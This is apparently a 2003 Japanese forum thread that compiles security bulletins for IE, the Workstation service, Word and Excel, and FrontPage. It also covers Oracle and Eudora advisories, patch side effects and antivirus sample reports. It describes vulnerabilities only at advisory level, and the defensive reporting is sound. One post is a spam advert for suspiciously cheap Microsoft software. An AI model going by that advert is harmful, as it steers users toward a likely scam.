Internet Explorer 5.01 Service Pack 4
Internet Explorer 5.01 Service Pack 3
Internet Explorer 5.01 Service Pack 2

技術的な詳細
技術的な説明 :
これは Internet Explorer 5.01、5.5 および 6 用に以前リリースされたすべての更新の機能を含む
累積的な更新です。さらに、新たに確認された次の 5 つの脆弱性を排除します。
・Internet Explorer のクロスドメイン セキュリティ モデル (異なるドメインのウィンドウが情報を
共有しないようにする) に関連する 3 つの脆弱性。これらの脆弱性により、マイ コンピュータ
ゾーンでスクリプトが実行される可能性があります。(略)
・Internet Explorer の XML オブジェクトにゾーン情報が渡される方法に関連する脆弱性。
この脆弱性により、攻撃者はユーザーのコンピュータ上のローカルファイルを読み取ることができる
可能性があります。(略)
・Internet Explorer の ダイナミック HTML (DHTML) イベント中のドラッグアンド ドロップ操作に
関連する脆弱性。この脆弱性により、ユーザーがリンクをクリックすると、ユーザーのコンピュータの
標的となる場所にファイルが保存される可能性があります。ユーザーにダウンロードを承認するよう
要求するダイアログは表示されません。(略)

マイクロソフト セキュリティ情報 MS03-004、MS03-015、MS03-020、MS03-032、および MS03-040 で
以前リリースされた Internet Explorer 用の累積的な更新のように、この累積的な更新は、HTML ヘルプ
の更新が適用されていない場合、window.showHelp( ) が機能を停止するようにします。サポート技術情報
811630 の更新された HTML ヘルプ コントロールがインストールされている場合、この更新を適用した後でも、
HTML ヘルプ機能を使用することができます。

再起動の必要性 :
Internet Explorer 6: コンピュータを再起動する必要があります。
Internet Explorer 5.01 および Internet Explorer 5.5 : Windows NT 4.0/2000 ベースのコンピュータ
では、コンピュータを再起動し、管理者としてログオンする必要があります。

以前の更新の状況 :
この更新は 2003 年 10 月にリリースされた MS03-040 の「Internet Explorer 用の累積的な修正プログラム
(828750)」を含みます。

なお、セキュリティホールmemoによるとPC-9800シリーズ用のInternet Explorerの
累積的な修正プログラムはWindows Updateから入手可能らしいです。

Workstation サービスのバッファ オーバーランにより、コードが実行される (828749) (MS03-049)
登録日 : 2003/11/12　更新日 : 2003/11/12
http://www.microsoft.com/japan/technet/security/bulletin/MS03-049.asp

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR WindowsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : システム管理者は直ちにこの更新をインストールして下さい。
含まれる過去の修正プログラム : なし
警告 : なし
テストしたソフトウェアおよび修正プログラムのダウンロード先
影響を受けるソフトウェア :
PC/AT PC-9800
Microsoft Windows 2000 Service Pack 2、Service Pack 3、または Service Pack 4
Microsoft Windows XP Service Pack 未適用、または Service Pack 1 注 -
Microsoft Windows XP 64-bit Edition 注 -

注 : 10 月 16 日にリリースされた MS03-043 (828035) の Windows XP 用のセキュリティ更新に、
この脆弱性に対する保護の手助けとなる更新されたファイルが含まれています。また、すでに
MS03-043 (828035) の修正プログラムを適用された Windows XP 環境では、Windows Update に、
このセキュリティ修正が表示されることはありません。しかし、このセキュリティ情報 (MS03-049) の
Windows 2000 用のセキュリティ修正プログラムには、MS03-043 (828035) に含まれていない更新された
ファイルが含まれています。MS03-043 (828035) の Windows 2000 用のセキュリティ更新を適用した
お客様も、この Windows 2000 のセキュリティ更新をインストールする必要があります。

影響を受けないソフトウェア :
Microsoft Windows NT Workstation 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
Microsoft Windows Millennium Edition
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows Server 2003
Microsoft Windows Server 2003 64-Bit Edition

セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS03-049

技術的な詳細
技術的な説明 :
Workstation サービスにセキュリティ上の脆弱性が存在し、これにより影響を受けるコンピュータで、
リモートでコードが実行される可能性があります。この脆弱性は Workstation サービスに未チェックの
バッファが含まれるため、起こります。(略)

問題を緩和する要素 :
受信 UDP ポート 138、139、445 および TCP ポート 138、139、445 を、ファイアウォールを使用して
ブロックしている場合、攻撃者が Workstation サービスにメッセージを送ることが阻止されます。
Windows XP のインターネット接続ファイアウォールなどのほとんどのファイアウォールはこれらのポートを
既定でブロックします。
Workstation サービスを無効にすることにより、攻撃の可能性が防がれますが、この回避策を実行すると、
多くの影響があります。詳細は「回避策」のセクションをご覧下さい。
Windows 2000 および Window XP のみがこの脆弱性の影響を受けます。そのほかのオペレーティング
システムはこの攻撃の影響は受けません。

深刻度 :
Microsoft Windows 2000 緊急
Microsoft Windows XP 緊急

回避策
マイクロソフトはこの脆弱性に対応するための次の回避策のテストを行ないました。
これらの回避策は根本的な脆弱性を修正しませんが、既知の攻撃の方法を阻止する手助けとなります。
回避策は機能の低下の原因となる場合もありますが、その場合には下に記します。

・ファイアウォールで UDP ポート 138、139、445 および TCP ポート 138、139、445 をブロックする
これらのポートはリモート コンピュータでリモート プロシージャコール (RPC) 接続を
受け入れるために使用されます。これらをファイアウォールでブロックすることにより、
ファイアウォールで保護されているコンピュータがこの脆弱性を悪用する攻撃を受けることを
防ぐ手助けとなります。
・Windows XP に含まれるインターネット接続ファイアウォールなどのパーソナル ファイアウォールを使用する
Windows XP のインターネット接続ファイアウォール機能を使用し、インターネット接続を
保護している場合、既定でインターネットからの受信トラフィックがブロックされます。

・Windows 2000 ベースのコンピュータおよび Windows XP ベースのコンピュータのアドバンスト TCP/IP フィルタリングを有効にする
アドバンスト TCP/IP フィルタリングを有効にすると、受信者が送信を要求していないすべての受信トラフィックをブロックすることができます。次のサポート技術情報で、この構成方法について説明しています。
http://support.microsoft.com/default.aspx?scid=kb;ja;309798
マイクロソフト サポート技術情報 - 309798 Windows 2000 で TCP/IP フィルタリングを構成する

・Workstation サービスを無効にする
Workstation サービスを無効にすることにより、攻撃の可能性が防がれます。(手順略)

回避策の影響 : Workstation サービスが無効にされている場合、コンピュータはネットワークの
共有ファイル リソースや共有印刷リソースに接続することができません。この回避策は、
スタンド アロンでネットワークに接続する必要のない多くのホーム ユーザーなどのコンピュータで
のみ使用して下さい。Workstation サービスが無効にされている場合、Workstation サービスに
明示的に依存しているすべてのサービスは起動せず、エラーメッセージがシステム イベント ログに
記録されます。次のサービスは Workstation サービスに依存しています。
Alerter (警告) Browser (ブラウザ) Messenger (メッセンジャ) Net Logon (ネットワーク ログオン) RPC Locator (RPC ロケータ)
これらのサービスはネットワークのリソースにアクセスする、またドメイン認証を実行するために
必要です。ダイヤルアップ接続、DSL 接続またはケーブル モデム接続など、スタンド アロン
コンピュータについてのインターネット接続およびブラウジングは、これらのサービスが無効に
されていても、影響は受けません。

注 : Microsoft Baseline Security Analyzer は Workstation サービスが無効にされている場合、
機能しません。そのほかのアプリケーションもまた、Workstation を必要とする場合があります。
アプリケーションが Workstation サービスを必要とする場合、単にこのサービスを再度有効にして
下さい。これは、Workstation サービスの [スタートアップの種類] を [自動] に戻し、コンピュータを
再起動することにより、行なうことができます。

再起動の必要性 :
この更新は再起動を必要としない場合もあります。インストーラが必要なサービスを停止し、
修正プログラムを適用し、次にそれらのサービスを再起動します。しかし、必要なサービスが
何らかの理由で停止されない場合、または必要なファイルが使用中である場合、再起動が必要と
なります。この場合、再起動が必要であることを通知する確認メッセージが表示されます。

重要：このセキュリティホールはWindows Updateでは自動更新されません。
ただしOffice Updateからインストールすることができます。
http://office.microsoft.com/ProductUpdates/default.aspx

Microsoft Word および Microsoft Excel の脆弱性により、任意のコードが実行される (831527) (MS03-050)
登録日 : 2003/11/12　更新日 : 2003/11/12
http://www.microsoft.com/japan/technet/security/bulletin/MS03-050.asp

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Excel または Microsoft Word を使用しているお客様
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 重要
推奨する対応策 : Microsoft Excel または Microsoft Word の影響を受けるバージョンを使用しているお客様は可能な限り早期に、適切なセキュリティ修正プログラムをインストールして下さい。
含まれる過去の修正プログラム Excel : この修正プログラムは次のセキュリティ情報で提供された修正プログラムを含みます。MS01-050、MS02-031、および MS02-059
含まれる過去の修正プログラム Word : この修正プログラムは次のセキュリティ情報で提供された修正プログラムを含みます。MS02-021、MS02-031、MS02-059、および MS03-035
警告 : なし
影響を受けるソフトウェア :
Microsoft Excel 97/2000/2002
Microsoft Word 97/98 (日本語版)/2000/2002
Microsoft Works Suite 2001/2002/2003/2004 (英語版)

Office アップデート からインストールすることもできます。
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp

影響を受けないソフトウェア :
Microsoft Office Word 2003
Microsoft Office Excel 2003

セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS03-050

技術的な詳細
技術的な説明 :
悪質なコードが実行される可能性のある脆弱性が Microsoft Excel に存在します。
この脆弱性は、Excel がマクロの指示を読み取る前に、スプレッドシートをチェックするために
使用する方法が原因となって、この脆弱性が起こります。(略)
悪質なコードが実行される可能性のある脆弱性が Microsoft Word に存在します。
Word が文書に埋め込まれているデータの値 (マクロの名前) の長さをチェックする方法が
原因となって、この脆弱性が存在します。不正な文書が作成され、それが開かれると、Word 内の
データの値がオーバーフローし、任意のコードが実行される可能性があります。(略)

深刻度 :ぜんぶ重要
回避策
この脆弱性は組み込みのマクロ セキュリティを無視するというものであるため、
この修正プログラムを適用できない場合の最善の回避策は、信頼されないソースからの文書を
開かないということです。

セキュリティ修正プログラムに関する情報
Microsoft Works Suite 2001 (英語版) については、Word 2000 のセクションをご覧下さい。
Microsoft Works Suite 2002、2003、および 2004 (いずれも英語版です) については、Word 2002 のセクションをご覧下さい。

・Microsoft Excel 97
　クライアント更新の必要条件
　このセキュリティ修正プログラムは Office 97 Service Release 2 を必要とします。
・Microsoft Excel 2000
　クライアント更新の必要条件
　重要 : この修正プログラムをインストールする前に、次の必要条件が満たされていることを確認して下さい。
　Microsoft Windows Installer 2.0
　Office 2000 Service Pack 3 (SP-3)
・Microsoft Excel 2002
　クライアント更新の必要条件
　重要 : この修正プログラムをインストールする前に、次の必要条件が満たされていることを確認して下さい。
　Microsoft Windows Installer 2.0
　Office XP Service Pack 2 (SP-2)
・Microsoft Word 97
　クライアント更新の必要条件
　このセキュリティ修正プログラムをインストールするには Office 97 Service Release 2 を必要とします。

・Microsoft Word 98 (日本語版)
　クライアント更新の必要条件
　このセキュリティ修正プログラムをインストールするには Office 97 Service Release 2 を必要とします。
・Microsoft Word 2000
　クライアント更新の必要条件
　重要 :この修正プログラムをインストールする前に、以下の要件が満たされていることを確認してください。　Microsoft Windows Installer 2.0
　Office 2000 Service Pack 3 (SP-3)
・Microsoft Word 2002
　クライアント アップデートの必要条件
　重要 : この修正プログラムをインストールする前に、次の必要条件が満たされていることを確認して下さい。
　Microsoft Windows Installer 2.0
　Office XP Service Pack 2 (SP-2)
詳細情報 :
よく寄せられる質問 ： マイクロソフトセキュリティ情報（MS03-050）
http://www.microsoft.com/japan/technet/security/bulletin/fq03-050.asp
US マイクロソフトセキュリティ情報（MS03-050）
http://www.microsoft.com/technet/security/bulletin/ms03-050.asp
この脆弱性に対するサポート技術情報 （KB） は現在準備中です。

Microsoft FrontPage Server Extensions のバッファ オーバーランにより、コードが実行される (813360) (MS03-051)
登録日 : 2003/11/12　更新日 : 2003/11/12
http://www.microsoft.com/japan/technet/security/bulletin/MS03-051.asp

概要 :
このセキュリティ情報の対象となるユーザー :
MicrosoftR FrontPage Server ExtensionsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様は、適切なセキュリティ修正プログラムを直ちにインストールしてください。
含まれる過去のセキュリティ修正プログラム : この修正プログラムは、マイクロソフト セキュリティ情報 MS01-035 および MS02-053で提供された修正も含まれています。
警告 : なし
テストしたソフトウェア

影響を受けるソフトウェア :
Microsoft Windows 2000 ServicePack 2、または ServicePack 3
Microsoft Windows XP 初期出荷版、または ServicePack 1
Microsoft Office XP 初期出荷版、Service Pack 1、または Service Pack 2

影響を受けないソフトウェア :
Windows NT 4.0 (FrontPage Server Extensions をインストールしていない場合)
Microsoft Windows 2000 ServicePack 4
Windows Server 2003 (Windows SharePoint Services)
Windows XP 64bit Edition version 2003 (英語版)
Microsoft Office System 2003
テストした Microsoft Windows および Office コンポーネント :

影響を受けるコンポーネント :
Microsoft FrontPage 2000 Server Extensions (Windows Update対応)
Microsoft FrontPage 2000 Server Extensions (Windows 2000 に同梱・Windows Update対応)
Microsoft FrontPage 2000 Server Extensions (Windows XP に同梱・Windows Update対応)
Microsoft FrontPage Server Extensions 2002
Microsoft SharePoint Team Services 2002 (Office XP に同梱・Office Update対応)

セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS03-051

技術的な詳細 技術的な説明 :
Microsoft FrontPage Server Extensions に 2 つのセキュリティ上の脆弱性が存在し、
最も深刻な場合、攻撃者がユーザーのコンピュータ上で任意のコードを実行する可能性があります。(略)

問題を緩和する要素 :
Windows 2000 システムに Service Pack 4 を適用した管理者は、これらの脆弱性による影響はありません。
Windows XP には既定で FrontPage Server Extensions がインストールされません。
Windows NT 4.0 には Windows NT4.0 Option Pack を適用していない限り、既定で FrontPage Server Extensions がインストールされません。

深刻度 : 全て緊急

Oracle9i Application Server におけるSQLインジェクション脆弱性 (oracle, 2003.11.12)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/11.html#20031112_oracle

Oracle による深刻度表記: 1 (「非常にリスクが高くあまり専門的な知識がなくても攻撃が
可能であるもの。影響が及ぶ製品に対して緊急（最も高い優先度）にパッチの適用または
回避策の実施が必要です」)。

Oracle9iAS Portal 9.0.2.3.0 以前、3.0.9.8.5 以前に欠陥。 Oracle9iAS Portal へのリクエスト
URL に対して SQL injection 攻撃が可能。この結果、remote から認証なしで Oracle9i 上の
データにアクセスすることが可能となる。
回避策はない。patch があるので適用すればよい。また OracleAS Portal 9.0.4 には
この欠陥はない。

SNS Advisory No.69　Eudora "Reply-To-All" Buffer Overflow Vulnerabilty
http://www.lac.co.jp/security/intelligence/SNSAdvisory/69.html

概要:　特定のバージョンの Eudora for Windows には、 Buffer Overflow を
生じさせてしまう問題が存在します。 悪意ある攻撃者はこの問題を利用することで、
標的ユーザの権限で任意のコードを実行できる可能性があります。

問題:　Eudora を利用し、ヘッダの From: フィールドに長大な文字列を含むメールを
受けとった場合、このメールに対して『全員に返信』を選択した場合に Buffer Overflow
が発生します。この現象は Reply-To: フィールドに長大な文字列を含むメールに
対して『全員に返信』を選択した場合にも発生します。 この問題を利用することで、
悪意ある攻撃者は Eudora を実行するユーザの権限で任意のコードを実行できる
可能性があります。

問題を確認したバージョン:
Eudora 5.1-J for Windows 日本語版
Eudora Version 5.2.0.9 for Windows 英語版

対策:
下記のバージョンへアップグレードを行うことでこの問題を解消することができます。
Eudora 5.1-Jr3 for Windows 日本語版 以降
Eudora Version 6.0 for Windows 英語版 以降

>>842-856　まとめ

月間セキュリティ情報
ttp://www.microsoft.com/japan/security/secinfo.asp

MS03-048: Internet Explorer 用の累積的なセキュリティ更新 (824145)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp

MS03-049: Workstation サービスのバッファ オーバーランにより、コードが実行される (828749)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-049.asp

MS03-050: Microsoft Word および Microsoft Excel の脆弱性により、任意のコードが実行される (831527)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-050.asp

MS03-051: Microsoft FrontPage Server Extensions のバッファ オーバーランにより、コードが実行される (813360)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-051.asp

OS: 048, 049, 051 （全て緊急）
Office: 050 （重要）

証明書確認の問題により、ID が偽装される (329115) (MS02-050)更新
（MS03-050ではない）

2003 年 11 月 11 日 （米国日付）、マイクロソフトはこのセキュリティ情報を更新し、
Microsoft Windows 2000 Service Pack 4 (SP4) のセキュリティ修正プログラムの
アップデート版が利用可能になったことをお知らせしました。このアップデート版の
修正プログラムは、Windows 2000 SP4 環境での Microsoft Internet Explorer 6
Service Pack 1 のインストール時に発生する可能性があるリグレッションを
修正します。このリグレッションにより、このセキュリティ情報で説明され、
Windows 2000 SP4 の一部として提供されているアップデートが削除されます。
Windows 2000 SP4 を使用し、かつ Internet Explorer 6 Service Pack 1 を
インストールしたお客様は、このアップデート版の Windows 2000 SP4 用の
修正プログラムを適用し、この脆弱性からコンピュータを保護するようにしてください。

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-050.asp

Windows 2000 Service Pack 4専用（これ以外は過去ログ参照）
(PC/AT) http://download.microsoft.com/download/2/a/1/2a197fde-3b95-4091-bfb6-c54d0a492b0e/Windows2000-KB329115-x86-JPN.exe
(PC-9800) http://download.microsoft.com/download/f/0/9/f091d1fa-d342-4882-aecb-981c45fe8e07/Windows2000-KB329115-nec98-JPN.exe

>>860
この情報（MS02-50)　をここで初めて知りました。　

ありがとうございます。

IE6バージョン情報の更新バージョン文字列が非常に長い状態だと、
SP1が当たっていても一部パッチチェックツールでGOLD（SP無し）と
判定されるっぽい。
（HFNetChkはエラー234を出すがGOLD扱いでチェックは続行）
-問題あり-
MBSA 1.1.1
HFNetChk 3.82.0.1（MBSA 1.1.1付属）
HFNetChk 3.86.0.1 *
HFNetChkPro/LT 4.0.76.6 *

-問題なし-
HFNetChkPro/LT 4.0.77.2 RC 1 *

-未確認-
HFNetChkPro/LT 4.0.77.1 *
その他古いもの

*はShavlikのサイト（http://www.shavlik.com/）にあるorあったもの。

更新バージョン文字列格納先
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MinorVersion

既出だったらスマソ。

>>861
追記
4.0.77.0の修正内容に似たようなのがあったので4.0.77.1でも問題無さそう。
> Corrected an issue where an Internet Explorer 5.5 SP2 installation
> might be reported as an Internet Explorer 5.5 Gold installation

まだこのスレには載っていないみたいなので、念のためまとめてみます。

◆◆ MS03-048 (824145) に関する非公式情報 ◆◆
このパッチにより、IEのスクロールバーの空白部分をクリックした時の
スクロールの挙動が変更されることがある模様です。
私の実験(WinXP Home SP1)では、（※下記2chスレによると、98,Me,2000でも同様です）
スクロールバーの空白部分をクリックすると、パッチをあてる前と比べて
約2倍スクロールします。ただし、スクロールバーの■になっている部分の
すぐ上か下(2pxくらい)をクリックした場合は 1画面分スクロールします。

また、IEでCtrl+Fを使った検索をしたときに、スクロールバーの▼部などを
クリックすると、検索がはじめからやり直しになりました。

未確認情報ですが、ブラウザの2ch投稿欄で横にスクロールさせようとすると
強制的にテキストの最後にカーソルがうつってしまうこともあるようです。

●関連リンク
MS03-048: Internet Explorer 用の累積的なセキュリティ更新 (824145)
ttp://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp

IE6.0に最新パッチ当てたらスクロールが二回分進む現象
http://news4.2ch.net/test/read.cgi/news/1068657452/l50

追記： 「アプリケーションの追加と削除」から
　　　　　「Internet Explorer Q824145」を削除すると
　　　　この問題はおこらなくなりました。

セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031112_MS03-049
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html
MS03-049が危険な理由 (ZDNet)
http://www.zdnet.co.jp/enterprise/0311/14/epn02.html

あなたが送られたファイルに関する情報や現在の状態をお知らせします。
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名:　結果: このファイルは次のウィルスに感染しています:
Hacktool.WKRShell
デベロッパーノート:
ファイル名 is non-repairable threat. NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest beta definitions.

Hacktool.WKRShell is non-repairable threat. NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary. Please follow the instruction at the end of this email message to install the latest beta definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。
（Ｃ）2003 シマンテック・セキュリティ・レスポンス
（Ｐ）2003 シマンテック・セキュリティ・レスポンス

このパッチの影響で、”極窓”が設定を記憶しないなどの影響がある模様。
俺の2000/IE5.01SP4でも発症

↑は最新版で対処済み

すみません、最近なんかパソコンの挙動がおかしく、送信バイト数がものすごい勢いで流れていくのを確認し、
何かと思ってNEGiEsでパケットモニタしてみると、ものすごい勢いでICMPプロトコルが流れていきます
読み取れないほどの速度で、１０分に１０ＭＢほど送信しています。
これって何でしょうか？(´・ω・｀)

ＯＳはウィンドウズ2000SP4&windowsアップデートのみ
LAN２本さして、片方はADSL側です

>>870=871
ウイルス検索はした？
というか、ここは質問スレじゃないぞ。

これに答えなくていいから別スレに行くべし。

>>870
【セキュリティ】 - Blasterスレ　part5
http://pc.2ch.net/test/read.cgi/sec/1065964513/

ここの6-25を熟読スレ。

http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=36309

>>864
マイクロソフト サポート技術情報 - 832270
スクロールバーの空白部分をクリックすると画面スクロールが正しく行われない
http://support.microsoft.com/default.aspx?scid=kb;ja;832270

http://www.symantec.com/region/jp/sarcj/data/h/hacktool.wsrshell.html

Hacktool.WKRShell
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031112_MS03-049
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html
MS03-049が危険な理由 (ZDNet)
http://www.zdnet.co.jp/enterprise/0311/14/epn02.html

>>876
スレ違いだろ。

>>876
間違えた。何回もコピペウザイ。

Windows HotFix Briefings Biweekly（11月21日版）
――　修正プログラム適用に関する問題点、不具合情報の隔週レポート　――
http://www.atmarkit.co.jp/fwin2k/hotfix/hfbw20031121/hfbw20031121_01.html

・MS03-043の修正プログラム適用で、Windows NT 4.0のネットワーク関連機能が機能不全を起こす
・MS03-045の修正プログラムを適用すると、テキスト・ボックスに入力した文字が重複して表示される
・MS03-050をExcel 97に適用すると郵便番号変換ウィザードが機能しなくなる
・「Windows XP SP1 USB 1.1 および 2.0 修正プログラム」の適用で、システムがハングアップする
・MS03-048を適用するとInternet Explorerの画面スクロールが正しく行われなくなる
・Windows 2000 SP4にIE 6.0 SP1を適用するとMS02-050の脆弱性が再発する問題を解決する
　修正プログラムの提供開始

マイクロソフト サポート技術情報 - 832547
[IE] Q824145 (MS03-048) のインストール後、エクスプローラの「関連項目」のリンクが機能しない
http://support.microsoft.com/default.aspx?scid=kb;ja;832547

http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031113__Opera
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/11.html#20031126_opera
Operaに複数の脆弱性がある模様。

http://jt.mozilla.gr.jp/projects/security/known-vulnerabilities.html
Mozillaに関する既知の脆弱性に関してはこちらをご覧下さい

Internet Explorerの新セキュリティホールは「極めて危険」http://www.zdnet.co.jp/enterprise/0311/26/epi02.html

一番いいのは、Windows使わないこと。これ最強！
実際、linuxでもMacでも困らんよ。

LinuxでもMacでもUNIXでもなんでも、きちんとパッチを当ててない
システムはどれも脆弱。これ管理者の常識。
そして、このスレはそういうことを論議するスレでもないことも知れ。

(´д`)ﾉｼ先生質問です！
昨日
Microsoft Windows XP 用セキュリティ問題の修正プログラム (KB828035)
をアップデートしたんですが
次の日PCを起動するといきなり青い画面が出てきて
なにかディスクスキャンらしきことを始めてますた。
これってアップデートしたこととは関係ないんですか？
しかも起動に時間がめっちゃかかるんですが...

インターネット上のwebサーバはWindowsよりUNIX系OSで立てた物が多いが
ここまで修正パッチに追われることも、頻繁にワームに感染して無駄なトラフィック
を垂れ流すこともない。

　一方Windowsのセキュリティ問題はOS構造そのものに起因しているので、一から
見直さない限り、セキュリティパッチ充て地獄からは逃れられない。

　例えばIEのような一ネットワークアプリをOSにくくりつけるのを止めるだけでも、
安全度は飛躍的にアップすると思われるが、独禁法のがれのためにIEはOSの一部と言い切
って しまった以上、いまさらOSとIEを切り離すことはできない。

　仕方がないのでMSは定期アップデイトという対症療法をユーザーに押しつけることにした。

>>885
こういうのがリナ鯖やウニ鯖運用したら、
ワームに感染しても気づかないんだろうな

>>656
お願いします

>>885　新しいＰＣに赤帽入れてとりあえずちゃんと動くかどうかネットにつなげて
その日は疲れたから電源入れっぱなしで寝たら、次の日しっかり踏み台にされたらしく
プロバから注意のメールが来てた。Linux恐るべし。

>>656
norton internet security2003 を使っているんですけど
firewallのプログラム制御で>>656は　すべて遮断　でいいんですか？

>>888
Debianにしてスクリプトで毎日apt-getして済ます。
おいらはソースにstableを指定して自爆したことがあるけど。

>>885

ホントにユーザーのため？ マイクロソフトのセキュリティ戦略を検証する
http://japan.cnet.com/news/pers/story/0,2000047682,20062200,00.htm

いい加減みんな気がつき始めてるな。。
だまされ続けてるのは頭の悪いドザだけということで。

>>888

詳細きぼん。踏み台にされたのは、何のサービス？

NASAかどっかへのアタックの踏み台にされたのも個人のLinuxPCだったっけ？
Linux＝安全と思いこんでる厨は本当に迷惑だな。

２５歳。
去年まで金無し君だったけど、ネット通販で
マイクロソフト製品を激安でゲット。一度やってみなよ。
買うだけ買って開封せずにオークションで転売することもできるし、ゲーム買って
近所のゲーム屋に売れば手っ取り早く現金にできる。
金無くてもオフィスXPとか超安い。
ダンジョンシージとかフライトシミュレーターとか色々あるのでマジでお勧め。

http://www.tatakiuri.com/

>>893
少なくともどっかのホムペ見ただけでウイルス感染するアホOSよりはマシ。

>>895
アホＯＳって、ＯＳＸっていう名前かい？

いえいえ、ブラウザーとOSが一体になっているウィンドウズのことです。

いい加減スレ違いな話はやみり。
ここはWindows関係のセキュリティ情報の交換場所。
ゴミが増えるのは迷惑。

Windowsもうだめぽ。。

http://slashdot.jp/security/03/11/28/148255.shtml?topic=72

IEに複数のセキュリティ・ホール，対策はアクティブスクリプトを無効にすること
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/

(･３･)ノ

IE 5.01 / 5.5 / 6 にいくつもの重大な欠陥
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/11.html#20031128_IE

http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00333.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00334.html
NAI VirusScan　JS/Exploit-WhoFramed
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00323.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00332.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00329.html
NAI VirusScan　JS/Exploit-FileProxy
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00324.html

ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: MhtRedirLaunchInetExe-Demo.zip
ファイル名: mhtml_file_for_codebase_automated.htm
デベロッパーノート

MhtRedirLaunchInetExe-Demo.zip is a self-extracting zip file that contains a clean file.
mhtml_file_for_codebase_automated.htm This file is proof-of-concept for an exploit.
It is not viral but we suggest to delete it.
This file is contained by MhtRedirLaunchInetExe-Demo.zip.

（Ｃ）2003 シマンテック・セキュリティ・レスポンス
（Ｐ）2003 シマンテック・セキュリティ・レスポンス

最近何も無いの？

>>903
Win98だけでなく、OfficeXP以前のパッチの提供が止まるかもしれない。

Internet Explorerにオンライン詐欺を助長する新たな欠陥

　米Microsoftのウェブブラウザ、Internet Explorer（IE）に新たな欠陥が発見された。
あるセキュリティ研究者によると、この欠陥を利用したオンライン詐欺師は、インター
ネットユーザーを騙し、機密情報を開示させたり、悪意あるコードを実行させることが
可能という。

http://japan.cnet.com/news/ent/story/0,2000047623,20062654,00.htm

Microsoftの“月例”セキュリティ・パッチ、今月はなし
ttp://arena.nikkeibp.co.jp/news/20031210/106687/

どーみてもさぼってるだけぢゃん。。。

>>906
新たにパッチを出すよりも、JAVAを外したりとか、
IEを外したりできる公式のソフトを出してほしい、そのほうが早いよ・・・

保守

ttp://www.asahi.com/national/update/1217/014.html
　patch 当ててなかったというのも痛い。
　除去するのにシステムの再インストールが必要だったって、いったい、、、

誰も責任取ることのないところなんてこんなもんでしょ。

URL偽装
ttp://pc.2ch.net/test/read.cgi/pcnews/1043134572/l50
%[email protected]/cda/special/2003/12/16/1522.html

IEにURLを偽装できるパッチ未公開の脆弱性が発見される
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/12.html#20031211_IE

NAI VirusScan のウィルス定義ファイル 4311 以降で、この欠陥に対応されている。
http://www.nai.com/japan/

Exploit-URLSpoof
http://www.nai.com/japan/security/virE.asp?v=Exploit-URLSpoof

こんな感じで表示される:
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/0105-exploit-urlspoof.jpg

　

Download.Trojan

セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

